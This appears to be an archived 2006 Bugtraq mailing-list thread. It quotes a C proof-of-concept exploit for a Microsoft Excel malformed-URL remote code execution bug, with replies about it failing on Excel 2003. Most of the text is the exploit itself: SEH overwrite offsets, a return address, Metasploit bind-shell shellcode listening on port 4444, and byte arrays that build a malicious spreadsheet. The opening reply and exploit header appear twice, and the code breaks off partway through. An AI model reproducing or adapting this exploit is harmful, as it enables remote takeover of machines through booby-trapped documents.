The excel sheet being generated in this poc may not be valid for excel
verions other than excel 2000 , you need to do some modifications in
order to generate a valid sheet for excel 2003, specifically take
care of the size of url string that is placed after the first header
and the actual buffer length, the excel will complain even on the
mistake of a single byte.There are better ways to generate such an
excel sheet though.
On 6/23/06, Jain, Siddhartha <Siddhartha.Jain (at) kla-tencor (dot) com [email concealed]> wrote:
> Failed against:
> - Microsoft Excel 2003 (11.8012.6568) SP2 on Windows XP Pro SP2
>
> * Excel complains that the excel sheet is corrupt
> * Excel tries to repair it but complains that its beyond replair
> * The first cell shows the word "LINK" without the hyperlink
>
>
>
> - Siddhartha
>
>
> -----Original Message-----
> From: naveed [mailto:naveedafzal (at) gmail (dot) com [email concealed]]
> Sent: Wednesday, June 21, 2006 9:42 PM
> To: bugtraq (at) securityfocus (dot) com [email concealed]
> Subject: MS Excel Remote Code Execution POC Exploit
>
> /*---------------------------------------------------------------------
> *
> * Microsoft Excel Remote Code Execution Proof Of Concept.
> * Tested against : Excel 2000 on Win XP SP1 , and Win2000 SP4
> * Description:
> * Microsoft Excel is prone to a remote code execution
> issue
> * which may be triggered when a malformed Excel document
> is opened.
> * The issue is due to an error in Excel while handling
> malformed URL
> * strings. there may be other ways to trigger this
> vulnerability,
> * successful exploitation could allow an attacker to
> execute
> * arbitrary code with the privileges of the user running
> Excel.
> *
> * Code execution is dependent upon certain factors
> including the
> * overflow condition, the MS Excel version and the host OS
> and SP.
> * If you cannot get it to work, attach it with the
> debugger check
> * the stack layout and the rest is on your imagination. :)
> :)
> *
> * Compile with MS VC++ or g++ ,it will generate the Excel
> file
> * Clicking the link in the file binds the shell ,
> * C:\nc localhost 4444
> *
> * Advisories:
> *
> http://www.microsoft.com/technet/security/advisory/921365.mspx
> * http://www.securityfocus.com/bid/18422/
> *
> * Disclaimer:
> * This Proof of concept code is for educational purposes
> only.
> * Please do not use it against any system without authorization..
> *
> * Greetings:
> * To all Pakistani Hackers and "script kiddies" :O :O :O
> * Special thanks to salman bro.
> *
> * --//
> * naveed afzal
>
> *-----------------------------------------------------------------------
verions other than excel 2000 , you need to do some modifications in
order to generate a valid sheet for excel 2003, specifically take
care of the size of url string that is placed after the first header
and the actual buffer length, the excel will complain even on the
mistake of a single byte.There are better ways to generate such an
excel sheet though.
On 6/23/06, Jain, Siddhartha <Siddhartha.Jain (at) kla-tencor (dot) com [email concealed]> wrote:
> Failed against:
> - Microsoft Excel 2003 (11.8012.6568) SP2 on Windows XP Pro SP2
>
> * Excel complains that the excel sheet is corrupt
> * Excel tries to repair it but complains that its beyond replair
> * The first cell shows the word "LINK" without the hyperlink
>
>
>
> - Siddhartha
>
>
> -----Original Message-----
> From: naveed [mailto:naveedafzal (at) gmail (dot) com [email concealed]]
> Sent: Wednesday, June 21, 2006 9:42 PM
> To: bugtraq (at) securityfocus (dot) com [email concealed]
> Subject: MS Excel Remote Code Execution POC Exploit
>
> /*---------------------------------------------------------------------
> *
> * Microsoft Excel Remote Code Execution Proof Of Concept.
> * Tested against : Excel 2000 on Win XP SP1 , and Win2000 SP4
> * Description:
> * Microsoft Excel is prone to a remote code execution
> issue
> * which may be triggered when a malformed Excel document
> is opened.
> * The issue is due to an error in Excel while handling
> malformed URL
> * strings. there may be other ways to trigger this
> vulnerability,
> * successful exploitation could allow an attacker to
> execute
> * arbitrary code with the privileges of the user running
> Excel.
> *
> * Code execution is dependent upon certain factors
> including the
> * overflow condition, the MS Excel version and the host OS
> and SP.
> * If you cannot get it to work, attach it with the
> debugger check
> * the stack layout and the rest is on your imagination. :)
> :)
> *
> * Compile with MS VC++ or g++ ,it will generate the Excel
> file
> * Clicking the link in the file binds the shell ,
> * C:\nc localhost 4444
> *
> * Advisories:
> *
> http://www.microsoft.com/technet/security/advisory/921365.mspx
> * http://www.securityfocus.com/bid/18422/
> *
> * Disclaimer:
> * This Proof of concept code is for educational purposes
> only.
> * Please do not use it against any system without authorization..
> *
> * Greetings:
> * To all Pakistani Hackers and "script kiddies" :O :O :O
> * Special thanks to salman bro.
> *
> * --//
> * naveed afzal
>
> *-----------------------------------------------------------------------
> ---*/
>
> #include <string.h>
> #include <fstream.h>
> #include <stdio.h>
>
> unsigned char ret_address[]="\x77\xF5\x76\xDE"; // WinXP SP1(english)
> pop/pop/ret in NTDLL.DLL
>
>
> //unsigned char ret_address[]="\x77\xF9\x2A\x9B"; // Win2K
> SP4(english) jmp ebx
>
> int seh_off = 4855; //SEH offset from the start of our
> buffer
> //For win2k it maybe +24
> //Check it in your
> debugger
>
> int buff_size = 0x152E; //approximate your buffer size to fill the
> stack beyond SEH
> //it is variant for
> different Excel versions
> //so again consult your
> debugger
>
> // win32_bind - Shellcode , port = 4444 , thanks to
> http://metasploit.com
> unsigned char shellcode[] =
> "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"
> "\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"
> "\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"
> "\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"
> "\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"
> "\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"
> "\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"
> "\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"
> "\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"
> "\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"
> "\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"
> "\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"
> "\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"
> "\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"
> "\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"
> "\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"
> "\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"
> "\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"
> "\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"
> "\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"
> "\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"
> "\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"
> "\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"
> "\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"
> "\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";
>
> //excel sheet formatting data bytes
>
> unsigned char stream1[] = {
> 0xD0, 0xCF, 0x11, 0xE0, 0xA1, 0xB1, 0x1A, 0xE1, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3E, 0x00,
> 0x03,
> 0x00, 0xFE, 0xFF, 0x09, 0x00,
> 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x01, 0x00, 0x00, 0x00,
> 0x0E, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10,
> 0x00,
> 0x00, 0xFE, 0xFF, 0xFF, 0xFF,
> 0x00, 0x00, 0x00, 0x00, 0xFE, 0xFF, 0xFF, 0xFF, 0x00, 0x00,
> 0x00,
> 0x00, 0x0F, 0x00, 0x00, 0x00,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0xFF,
> 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
> 0x09, 0x08, 0x10, 0x00, 0x00, 0x06, 0x05, 0x00, 0xBB, 0x0D,
> 0xCC,
> 0x07, 0x41, 0x00, 0x00, 0x00,
> 0x06, 0x00, 0x00, 0x00, 0x42, 0x00, 0x02, 0x00, 0xE4, 0x04,
> 0x8D,
> 0x00, 0x02, 0x00, 0x00, 0x00,
> 0x3D, 0x00, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x5C, 0x35,
> 0xED,
> 0x30, 0x38, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x01, 0x00, 0x58, 0x02, 0x22, 0x00, 0x02, 0x00,
> 0x00,
> 0x00, 0x31, 0x00, 0x15, 0x00,
> 0xC8, 0x00, 0x00, 0x00, 0xFF, 0x7F, 0x90, 0x01, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x05, 0x00,
> 0x41, 0x72, 0x69, 0x61, 0x6C, 0x31, 0x00, 0x15, 0x00, 0xC8,
> 0x00,
> 0x00, 0x00, 0xFF, 0x7F, 0x90,
> 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0x41,
> 0x72,
> 0x69, 0x61, 0x6C, 0x31, 0x00,
> 0x15, 0x00, 0xC8, 0x00, 0x00, 0x00, 0xFF, 0x7F, 0x90, 0x01,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x05, 0x00, 0x41, 0x72, 0x69, 0x61, 0x6C, 0x31, 0x00, 0x15,
> 0x00,
> 0xC8, 0x00, 0x00, 0x00, 0xFF,
> 0x7F, 0x90, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05,
> 0x00,
> 0x41, 0x72, 0x69, 0x61, 0x6C,
> 0x31, 0x00, 0x16, 0x00, 0xA0, 0x00, 0x00, 0x00, 0xFF, 0x7F,
> 0x90,
> 0x01, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x06, 0x00, 0x54, 0x61, 0x68, 0x6F, 0x6D, 0x61,
> 0x31,
> 0x00, 0x15, 0x00, 0xC8, 0x00,
> 0x00, 0x00, 0x0C, 0x00, 0x90, 0x01, 0x00, 0x00, 0x01, 0x00,
> 0x00,
> 0x00, 0x05, 0x00, 0x41, 0x72,
> 0x69, 0x61, 0x6C, 0xE0, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0xF5, 0xFF, 0x20, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0,
> 0x20,
> 0xE0, 0x00, 0x14, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00, 0xF4, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0xF5, 0xFF, 0x20, 0x00, 0x00,
> 0xF4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0,
> 0x20,
> 0xE0, 0x00, 0x14, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00, 0xF4, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0xF5, 0xFF, 0x20, 0x00, 0x00,
> 0xF4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0,
> 0x20,
> 0xE0, 0x00, 0x14, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00, 0xF4, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0xF5, 0xFF, 0x20, 0x00, 0x00,
> 0xF4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0,
> 0x20,
> 0xE0, 0x00, 0x14, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00, 0xF4, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0xF5, 0xFF, 0x20, 0x00, 0x00,
> 0xF4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0,
> 0x20,
> 0xE0, 0x00, 0x14, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00, 0xF4, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0xF5, 0xFF, 0x20, 0x00, 0x00,
> 0xF4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0,
> 0x20,
> 0xE0, 0x00, 0x14, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00, 0xF4, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0xF5, 0xFF, 0x20, 0x00, 0x00,
> 0xF4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0,
> 0x20,
> 0xE0, 0x00, 0x14, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00, 0xF4, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0xF5, 0xFF, 0x20, 0x00, 0x00,
> 0xF4, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0,
> 0x20,
> 0xE0, 0x00, 0x14, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x01, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00, 0x00, 0x2B,
> 0x00,
> 0xF5, 0xFF, 0x20, 0x00, 0x00,
> 0xF8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0,
> 0x20,
> 0xE0, 0x00, 0x14, 0x00, 0x00,
> 0x00, 0x29, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00, 0xF8, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00, 0x00, 0x2C,
> 0x00,
> 0xF5, 0xFF, 0x20, 0x00, 0x00,
> 0xF8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0,
> 0x20,
> 0xE0, 0x00, 0x14, 0x00, 0x00,
> 0x00, 0x2A, 0x00, 0xF5, 0xFF, 0x20, 0x00, 0x00, 0xF8, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0xC0, 0x20, 0xE0, 0x00, 0x14, 0x00, 0x00, 0x00, 0x09,
> 0x00,
> 0xF5, 0xFF, 0x20, 0x00, 0x00,
> 0xF8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0,
> 0x20,
> 0xE0, 0x00, 0x14, 0x00, 0x06,
> 0x00, 0x00, 0x00, 0x01, 0x00, 0x20, 0x00, 0x00, 0x08, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0xC0, 0x20, 0x93, 0x02, 0x04, 0x00, 0x10, 0x80, 0x03,
> 0xFF,
> 0x93, 0x02, 0x04, 0x00, 0x11,
> 0x80, 0x06, 0xFF, 0x93, 0x02, 0x04, 0x00, 0x12, 0x80, 0x04,
> 0xFF,
> 0x93, 0x02, 0x04, 0x00, 0x13,
> 0x80, 0x07, 0xFF, 0x93, 0x02, 0x04, 0x00, 0x00, 0x80, 0x00,
> 0xFF,
> 0x93, 0x02, 0x04, 0x00, 0x14,
> 0x80, 0x05, 0xFF, 0x92, 0x00, 0xE2, 0x00, 0x38, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0xFF, 0xFF, 0xFF,
> 0x00, 0xFF, 0x00, 0x00, 0x00, 0x00, 0xFF, 0x00, 0x00, 0x00,
> 0x00,
> 0xFF, 0x00, 0xFF, 0xFF, 0x00,
> 0x00, 0xFF, 0x00, 0xFF, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x80,
> 0x00,
> 0x00, 0x00, 0x00, 0x80, 0x00,
> 0x00, 0x00, 0x00, 0x80, 0x00, 0x80, 0x80, 0x00, 0x00, 0x80,
> 0x00,
> 0x80, 0x00, 0x00, 0x80, 0x80,
> 0x00, 0xC0, 0xC0, 0xC0, 0x00, 0x80, 0x80, 0x80, 0x00, 0x99,
> 0x99,
> 0xFF, 0x00, 0x99, 0x33, 0x66,
> 0x00, 0xFF, 0xFF, 0xCC, 0x00, 0xCC, 0xFF, 0xFF, 0x00, 0x66,
> 0x00,
> 0x66, 0x00, 0xFF, 0x80, 0x80,
> 0x00, 0x00, 0x66, 0xCC, 0x00, 0xCC, 0xCC, 0xFF, 0x00, 0x00,
> 0x00,
> 0x80, 0x00, 0xFF, 0x00, 0xFF,
> 0x00, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x80,
> 0x00,
> 0x80, 0x00, 0x80, 0x00, 0x00,
> 0x00, 0x00, 0x80, 0x80, 0x00, 0x00, 0x00, 0xFF, 0x00, 0x00,
> 0xCC,
> 0xFF, 0x00, 0xCC, 0xFF, 0xFF,
> 0x00, 0xCC, 0xFF, 0xCC, 0x00, 0xFF, 0xFF, 0x99, 0x00, 0x99,
> 0xCC,
> 0xFF, 0x00, 0xFF, 0x99, 0xCC,
> 0x00, 0xCC, 0x99, 0xFF, 0x00, 0xFF, 0xCC, 0x99, 0x00, 0x33,
> 0x66,
> 0xFF, 0x00, 0x33, 0xCC, 0xCC,
> 0x00, 0x99, 0xCC, 0x00, 0x00, 0xFF, 0xCC, 0x00, 0x00, 0xFF,
> 0x99,
> 0x00, 0x00, 0xFF, 0x66, 0x00,
> 0x00, 0x66, 0x66, 0x99, 0x00, 0x96, 0x96, 0x96, 0x00, 0x00,
> 0x33,
> 0x66, 0x00, 0x33, 0x99, 0x66,
> 0x00, 0x00, 0x33, 0x00, 0x00, 0x33, 0x33, 0x00, 0x00, 0x99,
> 0x33,
> 0x00, 0x00, 0x99, 0x33, 0x66,
> 0x00, 0x33, 0x33, 0x99, 0x00, 0x33, 0x33, 0x33, 0x00, 0x85,
> 0x00,
> 0x0E, 0x00, 0x22, 0x04, 0x00,
> 0x00, 0x00, 0x00, 0x06, 0x00, 0x53, 0x68, 0x65, 0x65, 0x74,
> 0x31,
> 0xFC, 0x00, 0x0F, 0x00, 0x01,
> 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00,
> 0x4C,
> 0x49, 0x4E, 0x4B, 0x0A, 0x00,
> 0x00, 0x00, 0x09, 0x08, 0x10, 0x00, 0x00, 0x06, 0x10, 0x00,
> 0xBB,
> 0x0D, 0xCC, 0x07, 0x41, 0x00,
> 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x2A, 0x00, 0x02, 0x00,
> 0x00,
> 0x00, 0x2B, 0x00, 0x02, 0x00,
> 0x01, 0x00, 0x82, 0x00, 0x02, 0x00, 0x00, 0x00, 0x80, 0x00,
> 0x08,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x25, 0x02, 0x04, 0x00, 0x00, 0x00,
> 0xFF,
> 0x00, 0x81, 0x00, 0x02, 0x00,
> 0xC1, 0x04, 0x14, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 0x15,
> 0x00,
> 0x03, 0x00, 0x00, 0x00, 0x00,
> 0x83, 0x00, 0x02, 0x00, 0x00, 0x00, 0x84, 0x00, 0x02, 0x00,
> 0x00,
> 0x00, 0x26, 0x00, 0x08, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xE8, 0x3F, 0x27, 0x00,
> 0x08,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0xE8, 0x3F, 0x28, 0x00, 0x08, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0xF0, 0x3F,
> 0x29, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0xF0,
> 0x3F, 0xA1, 0x00, 0x22, 0x00,
> 0x00, 0x00, 0x64, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x02,
> 0x00, 0x58, 0x02, 0x58, 0x02,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xE0, 0x3F, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0xE0, 0x3F,
> 0x01, 0x00, 0x55, 0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x02,
> 0x0E,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
> 0xFD,
> 0x00, 0x0A, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x15, 0x00, 0x00, 0x00, 0x00, 0x00, 0xB8, 0x01,
> 0x62,
> 0x15, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0xD0, 0xC9, 0xEA, 0x79, 0xF9, 0xBA,
> 0xCE,
> 0x11, 0x8C, 0x82, 0x00, 0xAA,
> 0x00, 0x4B, 0xA9, 0x0B, 0x02, 0x00, 0x00, 0x00, 0x03, 0x00,
> 0x00,
> 0x00, 0xE0, 0xC9, 0xEA, 0x79,
> 0xF9, 0xBA, 0xCE, 0x11, 0x8C, 0x82, 0x00, 0xAA, 0x00, 0x4B,
> 0xA9, 0x0B
> };
>
> unsigned char stream2[] = {
> 0x00, 0x00, 0x00, 0x3E, 0x02, 0x12, 0x00, 0xB6, 0x06, 0x00,
> 0x00,
> 0x00, 0x00, 0x40, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1D,
> 0x00,
> 0x0F, 0x00, 0x03, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x0A, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
> 0x00,
